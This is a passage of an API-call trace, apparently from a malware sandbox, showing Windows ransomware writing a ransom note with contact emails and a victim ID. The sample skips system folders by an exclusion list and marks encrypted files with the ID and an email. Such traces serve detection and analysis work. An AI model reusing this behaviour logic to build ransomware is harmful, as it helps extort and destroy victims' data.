buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0200.958] WriteFile (in: hFile=0x390, lpBuffer=0x188104*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0x188104*, lpNumberOfBytesWritten=0x188c28*=0x808, lpOverlapped=0x0) returned 1
	[0200.961] CloseHandle (hObject=0x390) returned 1
	[0200.961] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0200.961] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1880ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1880ec*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0200.962] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.962] GetUserNameA (in: lpBuffer=0x187fd0, pcbBuffer=0x1880e8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1880e8) returned 1
	[0200.963] wsprintfA (in: param_1=0x188b18, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0200.963] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0200.963] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0200.964] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0200.964] WriteFile (in: hFile=0x390, lpBuffer=0x188b18*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x188c30, lpOverlapped=0x0 | out: lpBuffer=0x188b18*, lpNumberOfBytesWritten=0x188c30*=0x43, lpOverlapped=0x0) returned 1
	[0200.964] CloseHandle (hObject=0x390) returned 1
	[0200.965] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbca4920, ftCreationTime.dwHighDateTime=0x1d973ea, ftLastAccessTime.dwLowDateTime=0x91442099, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x91501060, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName=".", cAlternateFileName="")) returned 0xfb93f0
	[0200.965] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\*.*") returned 95
	[0200.965] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0200.965] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\*.*", cchLength=0x5f | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*") returned 0x5f
	[0200.965] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.966] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="windows") returned 0x0
	[0200.966] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.966] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="boot") returned 0x0
	[0200.966] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.966] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="system volume information") returned 0x0
	[0200.966] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.967] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0200.967] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.967] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="temp") returned 0x0
	[0200.967] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.967] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="program files") returned 0x0
	[0200.967] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.967] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="program files (x86)") returned 0x0
	[0200.968] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.968] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="appdata") returned 0x0
	[0200.968] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.968] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="application data") returned 0x0
	[0200.968] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.968] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="winnt") returned 0x0
	[0200.968] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.969] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="tmp") returned 0x0
	[0200.969] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.969] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="cache") returned 0x0
	[0200.969] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.969] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="temporary internet files") returned 0x0
	[0200.969] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.970] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="webcache") returned 0x0
	[0200.970] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.994] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="inetcache") returned 0x0
	[0200.994] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.994] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="nvidia") returned 0x0
	[0200.994] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.994] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="packages") returned 0x0
	[0200.995] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.995] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="cookies") returned 0x0
	[0200.995] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.995] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="programdata") returned 0x0
	[0200.995] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0200.995] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0200.995] FindNextFileW (in: hFindFile=0xfb93f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbca4920, ftCreationTime.dwHighDateTime=0x1d973ea, ftLastAccessTime.dwLowDateTime=0x91442099, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x91501060, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="..", cAlternateFileName="")) returned 1
	[0200.996] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0200.996] FindNextFileW (in: hFindFile=0xfb93f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9141c057, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x9141c057, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x91442099, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x18240, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="cr_kbnc3kb_vylq.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="CR_KBN~1.SCL")) returned 1
	[0200.996] FindNextFileW (in: hFindFile=0xfb93f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91501060, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x91501060, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x91501060, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0200.996] FindNextFileW (in: hFindFile=0xfb93f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x914685ed, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x914685ed, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x914dab6e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0200.996] FindNextFileW (in: hFindFile=0xfb93f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50faa8e0, ftCreationTime.dwHighDateTime=0x1d974fe, ftLastAccessTime.dwLowDateTime=0x103ef9c0, ftLastAccessTime.dwHighDateTime=0x1d97501, ftLastWriteTime.dwLowDateTime=0x103ef9c0, ftLastWriteTime.dwHighDateTime=0x1d97501, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="wu9RMPx3T2rmzF3qVbg", cAlternateFileName="WU9RMP~1")) returned 1
	[0200.996] lstrcmpW (lpString1="wu9RMPx3T2rmzF3qVbg", lpString2="..") returned 1
	[0200.996] lstrcmpW (lpString1="wu9RMPx3T2rmzF3qVbg", lpString2=".") returned 1
	[0200.996] lstrcpyW (in: lpString1=0x188e5c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6"
	[0200.997] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\"
	[0200.997] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\", lpString2="wu9RMPx3T2rmzF3qVbg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg"
	[0200.997] lstrcpyW (in: lpString1=0x188354, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg"
	[0200.997] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\"
	[0200.997] lstrcpyW (in: lpString1=0x187f44, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\"
	[0200.997] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\*.*"
	[0200.997] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*"), lpFindFileData=0x188764 | out: lpFindFileData=0x188764*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50faa8e0, ftCreationTime.dwHighDateTime=0x1d974fe, ftLastAccessTime.dwLowDateTime=0x103ef9c0, ftLastAccessTime.dwHighDateTime=0x1d97501, ftLastWriteTime.dwLowDateTime=0x103ef9c0, ftLastWriteTime.dwHighDateTime=0x1d97501, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName=".", cAlternateFileName="")) returned 0xfb92b0
	[0200.998] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\*.*") returned 115
	[0200.998] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0200.998] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\*.*", cchLength=0x73 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*") returned 0x73
	[0200.998] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.998] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="windows") returned 0x0
	[0200.998] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.999] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="boot") returned 0x0
	[0200.999] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.999] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="system volume information") returned 0x0
	[0200.999] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.999] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0200.999] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.000] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="temp") returned 0x0
	[0201.000] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.000] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="program files") returned 0x0
	[0201.000] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.000] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="program files (x86)") returned 0x0
	[0201.000] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.000] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="appdata") returned 0x0
	[0201.001] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.001] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="application data") returned 0x0
	[0201.001] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.001] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="winnt") returned 0x0
	[0201.001] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.002] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="tmp") returned 0x0
	[0201.003] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.003] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="cache") returned 0x0
	[0201.003] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.003] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="temporary internet files") returned 0x0
	[0201.003] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.003] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="webcache") returned 0x0
	[0201.003] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.004] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="inetcache") returned 0x0
	[0201.004] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.004] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="nvidia") returned 0x0
	[0201.004] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.004] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="packages") returned 0x0
	[0201.004] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.005] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="cookies") returned 0x0
	[0201.005] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.005] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\*.*", lpSrch="programdata") returned 0x0
	[0201.005] FindNextFileW (in: hFindFile=0xfb92b0, lpFindFileData=0x188764 | out: lpFindFileData=0x188764*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50faa8e0, ftCreationTime.dwHighDateTime=0x1d974fe, ftLastAccessTime.dwLowDateTime=0x103ef9c0, ftLastAccessTime.dwHighDateTime=0x1d97501, ftLastWriteTime.dwLowDateTime=0x103ef9c0, ftLastWriteTime.dwHighDateTime=0x1d97501, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="..", cAlternateFileName="")) returned 1
	[0201.005] FindNextFileW (in: hFindFile=0xfb92b0, lpFindFileData=0x188764 | out: lpFindFileData=0x188764*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab376dd0, ftCreationTime.dwHighDateTime=0x1d9762e, ftLastAccessTime.dwLowDateTime=0xb30899b0, ftLastAccessTime.dwHighDateTime=0x1d9768a, ftLastWriteTime.dwLowDateTime=0xb30899b0, ftLastWriteTime.dwHighDateTime=0x1d9768a, nFileSizeHigh=0x0, nFileSizeLow=0x13cfc, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="2swzeiqW.flv", cAlternateFileName="")) returned 1
	[0201.005] lstrcmpW (lpString1="2swzeiqW.flv", lpString2="..") returned 1
	[0201.006] lstrcmpW (lpString1="2swzeiqW.flv", lpString2=".") returned 1
